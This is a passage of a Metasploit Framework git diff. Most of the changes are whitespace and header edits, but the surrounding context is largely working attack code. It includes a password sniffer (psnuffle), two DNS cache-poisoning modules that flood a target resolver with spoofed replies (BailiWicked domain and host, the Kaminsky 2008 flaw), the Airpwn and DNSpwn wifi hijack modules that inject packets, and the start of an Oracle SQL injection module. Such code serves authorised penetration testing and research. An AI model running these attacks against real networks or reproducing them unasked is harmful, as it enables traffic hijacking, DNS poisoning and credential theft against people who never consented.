b/modules/auxiliary/sniffer/psnuffle.rb index 6c8a824e30..f11be9ff44 100644 --- a/modules/auxiliary/sniffer/psnuffle.rb +++ b/modules/auxiliary/sniffer/psnuffle.rb @@ -1,16 +1,19 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ # ## - ## # dsniff was helping me very often. Too bad that it doesn't work correctly # anymore. Psnuffle should bring password sniffing into Metasploit local -# and if we get lucky even remote. +# and if we get lucky even remote. # # Cheers - Max Moser - mmo@remote-exploit.org ## @@ -23,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture - + def initialize super( 'Name' => 'pSnuffle Packet Sniffer', @@ -36,7 +39,7 @@ class Metasploit3 < Msf::Auxiliary [ 'Sniffer' ], [ 'List' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Sniffer' ], @@ -45,8 +48,8 @@ class Metasploit3 < Msf::Auxiliary register_options([ OptString.new('PROTOCOLS', [true, 'A comma-delimited list of protocols to sniff or "all".', "all"]), - ], self.class) - + ], self.class) + register_advanced_options([ OptPath.new('ProtocolBase', [true, 'The base directory containing the protocol decoders', File.join(Msf::Config.install_root, "data", "exploits", "psnuffle") @@ -60,7 +63,7 @@ class Metasploit3 < Msf::Auxiliary if (not File.directory?(base)) raise RuntimeError,"The ProtocolBase parameter is set to an invalid directory" end - + @protos = {} decoders = Dir.new(base).entries.grep(/\.rb$/).sort decoders.each do |n| @@ -72,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary proto = $1 klass = m.const_get("Sniffer#{proto}") @protos[proto.downcase] = klass.new(framework, self) - + print_status("Loaded protocol #{proto} from #{f}...") end rescue ::Exception => e @@ -80,16 +83,16 @@ class Metasploit3 < Msf::Auxiliary end end end - - def run + + def run # Load all of our existing protocols load_protocols - + if(action.name == 'List') print_status("Protocols: #{@protos.keys.sort.join(', ')}") return end - + # Remove protocols not explicitly allowed if(datastore['PROTOCOLS'] != 'all') allowed = datastore['PROTOCOLS'].split(',').map{|x| x.strip.downcase} @@ -98,19 +101,19 @@ class Metasploit3 < Msf::Auxiliary @protos = newlist end - print_status("Sniffing traffic.....") + print_status("Sniffing traffic.....") open_pcap - + each_packet do |pkt| eth = Racket::L2::Ethernet.new(pkt) next if not eth.ethertype == 0x0800 - + ip = Racket::L3::IPv4.new(eth.payload) next if not ip.protocol == 6 - + tcp = Racket::L4::TCP.new(ip.payload) next if !(tcp.payload and tcp.payload.length > 0) - + data = {:raw => pkt, :eth => eth, :ip => ip, :tcp => tcp} @protos.each_key do |k| @@ -121,13 +124,13 @@ class Metasploit3 < Msf::Auxiliary close_pcap print_status("Finished sniffing") end -end +end # End module class # Basic class for taking care of sessions class BaseProtocolParser - + attr_accessor :framework, :module, :sessions, :dport, :sigs def initialize(framework, mod) @@ -145,26 +148,26 @@ class BaseProtocolParser def register_sigs self.sigs = {} end - + # # Glue methods to bridge parsers to the main module class # def print_status(msg) self.module.print_status(msg) end - + def print_error(msg) self.module.print_error(msg) end - + def report_auth_info(*s) self.module.report_auth_info(*s) end - + def report_service(*s) self.module.report_service(*s) end - + def find_session(sessionid) sessions.each_key do |ses| # Check for cleanup abilities... kills performance in large environments maybe @@ -182,30 +185,30 @@ class BaseProtocolParser # Create a new session entry along with the host/port from the id if (sessionid =~ /^([^:]+):([^-]+)-/s) sessions[sessionid] = { - :host => $1, - :target_host => $1, - :port => $2, - :target_port => $2, - :session => sessionid, - :ctime => Time.now, + :host => $1, + :target_host => $1, + :port => $2, + :target_port => $2, + :session => sessionid, + :ctime => Time.now, :mtime => Time.now } end end - + return sessions[sessionid] end - - def get_session_src(pkt) + + def get_session_src(pkt) return "#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}" if pkt[:tcp] - return "#{pkt[:ip].dst_ip}:#{pkt[:udp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:udp].src_port}" if pkt[:udp] - return "#{pkt[:ip].dst_ip}:0-#{pkt[:ip].src_ip}:0" + return "#{pkt[:ip].dst_ip}:#{pkt[:udp].dst_port}-#{pkt[:ip].src_ip}:#{pkt[:udp].src_port}" if pkt[:udp] + return "#{pkt[:ip].dst_ip}:0-#{pkt[:ip].src_ip}:0" end - - def get_session_dst(pkt) + + def get_session_dst(pkt) return "#{pkt[:ip].src_ip}:#{pkt[:tcp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:tcp].dst_port}" if pkt[:tcp] - return "#{pkt[:ip].src_ip}:#{pkt[:udp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:udp].dst_port}" if pkt[:udp] - return "#{pkt[:ip].src_ip}:0-#{pkt[:ip].dst_ip}:0" + return "#{pkt[:ip].src_ip}:#{pkt[:udp].src_port}-#{pkt[:ip].dst_ip}:#{pkt[:udp].dst_port}" if pkt[:udp] + return "#{pkt[:ip].src_ip}:0-#{pkt[:ip].dst_ip}:0" end end diff --git a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb index 6f0fb32227..9a1a44f530 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_domain.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_domain.rb @@ -1,3 +1,14 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + require 'msf/core' require 'net/dns' require 'racket' @@ -9,23 +20,23 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'DNS BailiWicked Domain Attack', 'Description' => %q{ - This exploit attacks a fairly ubiquitous flaw in DNS implementations which + This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target domains nameserver entries in a vulnerable DNS cache server. This attack works by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and the nameserver entries for the target domain will be replaced by the server - specified in the NEWDNS option of this exploit. + specified in the NEWDNS option of this exploit. }, - 'Author' => - [ + 'Author' => + [ ' I)ruid', 'hdm', # - 'Cedric Blancher ' # Cedric figured out the NS injection method + 'Cedric Blancher ' # Cedric figured out the NS injection method # and was cool enough to email us and share! # ], @@ -39,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jul 21 2008' )) - + register_options( [ OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), @@ -50,29 +61,29 @@ class Metasploit3 < Msf::Auxiliary OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]), ], self.class) - + deregister_options('FILTER','PCAPFILE') end - + def auxiliary_commands - return { + return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable", "racer" => "Determine the size of the window for the target server" } end - + def cmd_racer(*args) targ = args[0] || rhost() dom = args[1] || "example.com" - + if !(targ and targ.length > 0) print_status("usage: racer [dns-server] [domain]") return end - - calculate_race(targ, dom) + + calculate_race(targ, dom) end - + def cmd_check(*args) targ = args[0] || rhost() if !(targ and targ.length > 0) @@ -84,20 +95,20 @@ class Metasploit3 < Msf::Auxiliary srv_sock = Rex::Socket.create_udp( 'PeerHost' => targ, 'PeerPort' => 53 - ) + ) random = false ports = {} lport = nil reps = 0 - + 1.upto(30) do |i| - + req = Resolv::DNS::Message.new txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 - + srv_sock.put(req.encode) res, addr = srv_sock.recvfrom(65535, 1.0) @@ -120,24 +131,24 @@ class Metasploit3 < Msf::Auxiliary end end end - - + + if(i>5 and ports.keys.length == 0) break - end + end end - + srv_sock.close - + if(ports.keys.length == 0) print_status("ERROR: This server is not replying to recursive requests") return end - + if(reps < 30) print_status("WARNING: This server did not reply to all of our requests") end - + if(random) ports_u = ports.keys.length ports_r = ((ports.keys.length/30.0)*100).to_i @@ -149,7 +160,7 @@ class Metasploit3 < Msf::Auxiliary print_status("FAIL: This server uses a static source port and is vulnerable to poisoning") end end - + def run target = rhost() source = Rex::Socket.source_address(target) @@ -161,7 +172,7 @@ class Metasploit3 < Msf::Auxiliary xids = datastore['XIDS'].to_i newttl = datastore['TTL'].to_i xidbase = rand(20001) + 20000 - numxids = xids + numxids = xids address = Rex::Text.rand_text(4).unpack("C4").join(".") srv_sock = Rex::Socket.create_udp( @@ -175,10 +186,10 @@ class Metasploit3 < Msf::Auxiliary txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 - + srv_sock.put(req.encode) res, addr = srv_sock.recvfrom() - + if res and res.length > 0 res = Resolv::DNS::Message.decode(res) res.each_answer do |name, ttl, data| @@ -219,7 +230,7 @@ class Metasploit3 < Msf::Auxiliary return end end - + end end until not cached rescue ::Interrupt @@ -247,7 +258,7 @@ class Metasploit3 < Msf::Auxiliary #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" answer1.answer.each do |rr1| print_status " Got an #{rr1.type} record: #{rr1.inspect}" - res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) + res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." answer2 = res2.send(domain, Net::DNS::SOA) if answer2 and answer2.header.auth? and answer2.header.anCount >= 1 @@ -256,7 +267,7 @@ class Metasploit3 < Msf::Auxiliary print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" end end - end + end end if barbs.length == 0 @@ -265,7 +276,7 @@ class Metasploit3 < Msf::Auxiliary close_pcap return end - + if(xids == 0) print_status("Calculating the number of spoofed replies to send per query...") qcnt = calculate_race(target, domain, 100) @@ -275,10 +286,10 @@ class Metasploit3 < Msf::Auxiliary srv_sock.close close_pcap return - end + end print_status("Sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query") end - + # Flood the target with queries and spoofed responses, one will eventually hit queries = 0 responses = 0 @@ -298,11 +309,11 @@ class Metasploit3 < Msf::Auxiliary req.rd = 1 src_ip = source - + if(saddr == 'Random') src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") end - + n = Racket::Racket.new n.l3 = Racket::L3::IPv4.new n.l3.src_ip = src_ip @@ -314,12 +325,12 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = (rand((2**16)-1024)+1024).to_i n.l4.dst_port = 53 n.l4.payload = req.encode - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) - buff = n.pack + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + buff = n.pack capture_sendto(buff, target) queries += 1 - + # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(newdns))) @@ -331,14 +342,14 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = 53 n.l4.dst_port = sport.to_i n.l4.payload = req.encode - + xidbase.upto(xidbase+numxids-1) do |id| req.id = id - barbs.each do |barb| + barbs.each do |barb| n.l3.src_ip = barb[:addr].to_s - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) buff = n.pack - + capture_sendto(buff, target) responses += 1 end @@ -358,16 +369,16 @@ class Metasploit3 < Msf::Auxiliary return end print_status("Now sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query") - end + end end # every so often, check and see if the target is poisoned... - if queries % 250 == 0 + if queries % 250 == 0 begin query = Resolv::DNS::Message.new query.add_question(domain, Resolv::DNS::Resource::IN::NS) query.rd = 0 - + srv_sock.put(query.encode) answer, addr = srv_sock.recvfrom() @@ -397,8 +408,8 @@ class Metasploit3 < Msf::Auxiliary # Send a recursive query to the target server, then flood # the server with non-recursive queries for the same entry. # Calculate how many non-recursive queries we receive back - # until the real server responds. This should give us a - # ballpark figure for ns->ns latency. We can repeat this + # until the real server responds. This should give us a + # ballpark figure for ns->ns latency. We can repeat this # a few times to account for each nameserver the cache server # may query for the target domain. # @@ -409,9 +420,9 @@ class Metasploit3 < Msf::Auxiliary cnt = 0 times = [] - + hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain - + sock = Rex::Socket.create_udp( 'PeerHost' => server, 'PeerPort' => 53 @@ -426,7 +437,7 @@ class Metasploit3 < Msf::Auxiliary q_beg_t = Time.now.to_f sock.put(req.encode) req.rd = 0 - + while(times.length < num) res, addr = sock.recvfrom(65535, 0.01) @@ -436,31 +447,31 @@ class Metasploit3 < Msf::Auxiliary if(res.id == 1) times << [Time.now.to_f - q_beg_t, cnt] cnt = 0 - + hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain - sock.close + sock.close sock = Rex::Socket.create_udp( 'PeerHost' => server, 'PeerPort' => 53 - ) - + ) + q_beg_t = Time.now.to_f req = Resolv::DNS::Message.new req.add_question(hostname, Resolv::DNS::Resource::IN::A) req.rd = 1 req.id = 1 - + sock.put(req.encode) - req.rd = 0 + req.rd = 0 end - + cnt += 1 end - + req.id += 1 - - sock.put(req.encode) + + sock.put(req.encode) end min_time = (times.map{|i| i[0]}.min * 100).to_i / 100.0 @@ -468,20 +479,20 @@ class Metasploit3 < Msf::Auxiliary sum = 0 times.each{|i| sum += i[0]} avg_time = ( (sum / times.length) * 100).to_i / 100.0 - + min_count = times.map{|i| i[1]}.min max_count = times.map{|i| i[1]}.max sum = 0 times.each{|i| sum += i[1]} avg_count = sum / times.length - + sock.close - + print_status(" race calc: #{times.length} queries | min/max/avg time: #{min_time}/#{max_time}/#{avg_time} | min/max/avg replies: #{min_count}/#{max_count}/#{avg_count}") # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times) avg_count - end - + end + end diff --git a/modules/auxiliary/spoof/dns/bailiwicked_host.rb b/modules/auxiliary/spoof/dns/bailiwicked_host.rb index 0b126d0afd..21f095587c 100644 --- a/modules/auxiliary/spoof/dns/bailiwicked_host.rb +++ b/modules/auxiliary/spoof/dns/bailiwicked_host.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + require 'msf/core' require 'net/dns' require 'racket' @@ -9,15 +13,15 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Capture def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'DNS BailiWicked Host Attack', 'Description' => %q{ - This exploit attacks a fairly ubiquitous flaw in DNS implementations which + This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those - queries from the authoritative nameservers for that domain. Eventually, a - guessed ID will match, the spoofed packet will get accepted, and due to the + queries from the authoritative nameservers for that domain. Eventually, a + guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached. }, @@ -32,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary ], 'DisclosureDate' => 'Jul 21 2008' )) - + register_options( [ OptEnum.new('SRCADDR', [true, 'The source address to use for sending the queries', 'Real', ['Real', 'Random'], 'Real']), @@ -42,29 +46,29 @@ class Metasploit3 < Msf::Auxiliary OptAddress.new('RECONS', [true, 'The nameserver used for reconnaissance', '208.67.222.222']), OptInt.new('XIDS', [true, 'The number of XIDs to try for each query (0 for automatic)', 0]), OptInt.new('TTL', [true, 'The TTL for the malicious host entry', rand(20000)+30000]), - + ], self.class) deregister_options('FILTER','PCAPFILE') - + end - + def auxiliary_commands - return { + return { "check" => "Determine if the specified DNS server (RHOST) is vulnerable", "racer" => "Determine the size of the window for the target server", } end - + def cmd_racer(*args) targ = args[0] || rhost() dom = args[1] || "example.com" - + if !(targ and targ.length > 0) print_status("usage: racer [dns-server] [domain]") return end - + calculate_race(targ, dom) end @@ -79,20 +83,20 @@ class Metasploit3 < Msf::Auxiliary srv_sock = Rex::Socket.create_udp( 'PeerHost' => targ, 'PeerPort' => 53 - ) + ) random = false ports = {} lport = nil reps = 0 - + 1.upto(30) do |i| - + req = Resolv::DNS::Message.new txt = "spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 - + srv_sock.put(req.encode) res, addr = srv_sock.recvfrom(65535, 1.0) @@ -115,24 +119,24 @@ class Metasploit3 < Msf::Auxiliary end end end - - + + if(i>5 and ports.keys.length == 0) break - end + end end - + srv_sock.close - + if(ports.keys.length == 0) print_status("ERROR: This server is not replying to recursive requests") return end - + if(reps < 30) print_status("WARNING: This server did not reply to all of our requests") end - + if(random) ports_u = ports.keys.length ports_r = ((ports.keys.length/30.0)*100).to_i @@ -144,11 +148,11 @@ class Metasploit3 < Msf::Auxiliary print_status("FAIL: This server uses a static source port and is vulnerable to poisoning") end end - + def run target = rhost() source = Rex::Socket.source_address(target) - saddr = datastore['SRCADDR'] + saddr = datastore['SRCADDR'] sport = datastore['SRCPORT'] hostname = datastore['HOSTNAME'] + '.' address = datastore['NEWADDR'] @@ -159,7 +163,7 @@ class Metasploit3 < Msf::Auxiliary numxids = xids domain = hostname.sub(/\w+\x2e/,"") - + srv_sock = Rex::Socket.create_udp( 'PeerHost' => target, 'PeerPort' => 53 @@ -171,10 +175,10 @@ class Metasploit3 < Msf::Auxiliary txt = "spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com" req.add_question(txt, Resolv::DNS::Resource::IN::TXT) req.rd = 1 - + srv_sock.put(req.encode) res, addr = srv_sock.recvfrom() - + if res and res.length > 0 res = Resolv::DNS::Message.decode(res) res.each_answer do |name, ttl, data| @@ -205,7 +209,7 @@ class Metasploit3 < Msf::Auxiliary if answer and answer.length > 0 answer = Resolv::DNS::Message.decode(answer) answer.each_answer do |name, ttl, data| - + if((name.to_s + ".") == hostname) t = Time.now + ttl print_status("Failure: This hostname is already in the target cache: #{name}") @@ -214,7 +218,7 @@ class Metasploit3 < Msf::Auxiliary sleep ttl end end - + end end until not cached rescue ::Interrupt @@ -241,7 +245,7 @@ class Metasploit3 < Msf::Auxiliary #print_status " Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities" answer1.answer.each do |rr1| print_status " Got an #{rr1.type} record: #{rr1.inspect}" - res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) + res2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) print_status " Checking Authoritativeness: Querying #{rr1.address} for #{domain}..." answer2 = res2.send(domain, Net::DNS::SOA) if answer2 and answer2.header.auth? and answer2.header.anCount >= 1 @@ -250,7 +254,7 @@ class Metasploit3 < Msf::Auxiliary print_status " #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as" end end - end + end end if barbs.length == 0 @@ -270,7 +274,7 @@ class Metasploit3 < Msf::Auxiliary srv_sock.close close_pcap return - end + end print_status("Sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query") end @@ -294,11 +298,11 @@ class Metasploit3 < Msf::Auxiliary req.rd = 1 src_ip = source - + if(saddr == 'Random') src_ip = Rex::Text.rand_text(4).unpack("C4").join(".") end - + n = Racket::Racket.new n.l3 = Racket::L3::IPv4.new n.l3.src_ip = src_ip @@ -310,13 +314,13 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = (rand((2**16)-1024)+1024).to_i n.l4.dst_port = 53 n.l4.payload = req.encode - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) - buff = n.pack + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + buff = n.pack capture_sendto(buff, target) - + queries += 1 - + # Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) req.add_answer(randhost, newttl, Resolv::DNS::Resource::IN::A.new(address)) req.add_authority(domain, newttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) @@ -328,14 +332,14 @@ class Metasploit3 < Msf::Auxiliary n.l4.src_port = 53 n.l4.dst_port = sport.to_i n.l4.payload = req.encode - + xidbase.upto(xidbase+numxids-1) do |id| req.id = id barbs.each do |barb| n.l3.src_ip = barb[:addr].to_s - n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) + n.l4.fix!(n.l3.src_ip, n.l3.dst_ip) buff = n.pack - + capture_sendto(buff, target) responses += 1 end @@ -355,16 +359,16 @@ class Metasploit3 < Msf::Auxiliary return end print_status("Now sending #{numxids} spoofed replies from each nameserver (#{barbs.length}) for each query") - end + end end # every so often, check and see if the target is poisoned... - if queries % 250 == 0 + if queries % 250 == 0 begin query = Resolv::DNS::Message.new query.add_question(hostname, Resolv::DNS::Resource::IN::A) query.rd = 0 - + srv_sock.put(query.encode) answer, addr = srv_sock.recvfrom() @@ -392,8 +396,8 @@ class Metasploit3 < Msf::Auxiliary # Send a recursive query to the target server, then flood # the server with non-recursive queries for the same entry. # Calculate how many non-recursive queries we receive back - # until the real server responds. This should give us a - # ballpark figure for ns->ns latency. We can repeat this + # until the real server responds. This should give us a + # ballpark figure for ns->ns latency. We can repeat this # a few times to account for each nameserver the cache server # may query for the target domain. # @@ -404,9 +408,9 @@ class Metasploit3 < Msf::Auxiliary cnt = 0 times = [] - + hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain - + sock = Rex::Socket.create_udp( 'PeerHost' => server, 'PeerPort' => 53 @@ -421,7 +425,7 @@ class Metasploit3 < Msf::Auxiliary q_beg_t = Time.now.to_f sock.put(req.encode) req.rd = 0 - + while(times.length < num) res, addr = sock.recvfrom(65535, 0.01) @@ -431,52 +435,52 @@ class Metasploit3 < Msf::Auxiliary if(res.id == 1) times << [Time.now.to_f - q_beg_t, cnt] cnt = 0 - + hostname = Rex::Text.rand_text_alphanumeric(rand(10)+10) + '.' + domain - sock.close + sock.close sock = Rex::Socket.create_udp( 'PeerHost' => server, 'PeerPort' => 53 - ) - + ) + q_beg_t = Time.now.to_f req = Resolv::DNS::Message.new req.add_question(hostname, Resolv::DNS::Resource::IN::A) req.rd = 1 req.id = 1 - + sock.put(req.encode) - req.rd = 0 + req.rd = 0 end - + cnt += 1 end - + req.id += 1 - - sock.put(req.encode) + + sock.put(req.encode) end - + min_time = (times.map{|i| i[0]}.min * 100).to_i / 100.0 max_time = (times.map{|i| i[0]}.max * 100).to_i / 100.0 sum = 0 times.each{|i| sum += i[0]} avg_time = ( (sum / times.length) * 100).to_i / 100.0 - + min_count = times.map{|i| i[1]}.min max_count = times.map{|i| i[1]}.max sum = 0 times.each{|i| sum += i[1]} avg_count = sum / times.length - + sock.close - + print_status(" race calc: #{times.length} queries | min/max/avg time: #{min_time}/#{max_time}/#{avg_time} | min/max/avg replies: #{min_count}/#{max_count}/#{avg_count}") # XXX: We should subtract the timing from the target to us (calculated based on 0.50 of our non-recursive query times) avg_count - end - + end + end diff --git a/modules/auxiliary/spoof/wifi/airpwn.rb b/modules/auxiliary/spoof/wifi/airpwn.rb index 5e48e9ba50..8e4e28ff6e 100644 --- a/modules/auxiliary/spoof/wifi/airpwn.rb +++ b/modules/auxiliary/spoof/wifi/airpwn.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -17,7 +17,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'Airpwn TCP hijack', @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary [ [ 'Airpwn' ] ], - 'PassiveActions' => + 'PassiveActions' => [ 'Capture' ], @@ -50,7 +50,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptPath.new('SITELIST', [ false, "YAML file of URL/Replacement pairs for GET replacement", - File.join(Msf::Config.install_root, "data", "exploits", "wifi", "airpwn", "sitelist.yml") + File.join(Msf::Config.install_root, "data", "exploits", "wifi", "airpwn", "sitelist.yml") ]), OptBool.new('USESITEFILE', [ true, "Use site list file for match/response", "false"]), OptString.new('FILTER', [ true, "Default BPF filter", "port 80"]), @@ -114,10 +114,10 @@ class Metasploit3 < Msf::Auxiliary # If we have headers if r["txresponse"].scan(/[^:?]+: .+\n/m).size > 0 # But not a content-length - if r["txresponse"].scan(/^Content-Length: /).size == 0 + if r["txresponse"].scan(/^Content-Length: /).size == 0 # Figure out the length and add it loc = (/\n\n/m =~ r["txresponse"]) - if loc == nil + if loc == nil print_status "AIRPWN: Response packet looks like HTTP headers but can't find end of headers. Will inject as-is." else print_status "AIRPWN: Response packet looks like HTTP headers but has no Content-Length, adding one." @@ -134,9 +134,9 @@ class Metasploit3 < Msf::Auxiliary print_status "Opening wifi module." open_wifi - self.wifi.filter = @filter if (@filter != "") + self.wifi.filter = @filter if (@filter != "") each_packet do |pkt| - + d3 = pkt.dot3 next if not d3 @@ -151,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary @http.each do |r| hit = nil - r['regex'].each do |reg| + r['regex'].each do |reg| hit = tcp.payload.scan(/#{reg}/) || nil break if hit.size != 0 end @@ -201,7 +201,7 @@ class Metasploit3 < Msf::Auxiliary injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS end - self.wifi.inject(injpkt) or print_status("AIRPWN failed to inject packet: " + tx.error) + self.wifi.inject(injpkt) or print_status("AIRPWN failed to inject packet: " + tx.error) response.l4.seq = response.l4.seq + response.l5.payload.size response.l4.flag_ack = 1 @@ -211,7 +211,7 @@ class Metasploit3 < Msf::Auxiliary response.l4.fix!(response.l3.src_ip, response.l3.dst_ip, "") injpkt.dot3 = response.pack - self.wifi.inject(injpkt) or print_status("AIRPWN failed to inject packet: " + tx.error) + self.wifi.inject(injpkt) or print_status("AIRPWN failed to inject packet: " + tx.error) end end diff --git a/modules/auxiliary/spoof/wifi/dnspwn.rb b/modules/auxiliary/spoof/wifi/dnspwn.rb index 096bc2faa5..70776f4611 100644 --- a/modules/auxiliary/spoof/wifi/dnspwn.rb +++ b/modules/auxiliary/spoof/wifi/dnspwn.rb @@ -3,7 +3,7 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Lorcon2 include Msf::Auxiliary::Report - + def initialize super( 'Name' => 'DNSpwn DNS hijack', @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptPath.new('DNSLIST', [ false, "YAML file of DNS entries for replacement", - File.join(Msf::Config.install_root, "data", "exploits", "wifi", "dnspwn", "dnslist.yml") + File.join(Msf::Config.install_root, "data", "exploits", "wifi", "dnspwn", "dnslist.yml") ]), OptBool.new('USEDNSFILE', [ true, "Use dns list file for response", "false"]), OptString.new('FILTER', [ true, "Default BPF filter", "port 53"]), @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Auxiliary @dns.each do |r| hit = nil - r['regex'].each do |reg| + r['regex'].each do |reg| hit = dns.question[0].qName.scan(/#{reg}/) || nil break if hit.size != 0 end @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary injpkt.direction = Lorcon::Packet::LORCON_ADHOC_DS end - self.wifi.inject(injpkt) or print_status("DNSPWN failed to inject packet: " + tx.error) + self.wifi.inject(injpkt) or print_status("DNSPWN failed to inject packet: " + tx.error) end end end diff --git a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb index 3180314139..a3e02fc236 100644 --- a/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb +++ b/modules/auxiliary/sqli/oracle/dbms_cdc_ipublish.rb @@ -1,3 +1,7 @@ +## +# $Id$ +## + ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit @@ -15,10 +19,10 @@ class Metasploit3 < Msf::Auxiliary super(update_info(info, 'Name' => 'SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE', 'Description' => %q{ - The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE - procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege - on the vulnerable package can exploit this vulnerability. By default, users granted - EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database + The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE + procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege + on the vulnerable package can exploit this vulnerability. By default, users granted + EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU. }, 'Author' => [ 'MC' ], 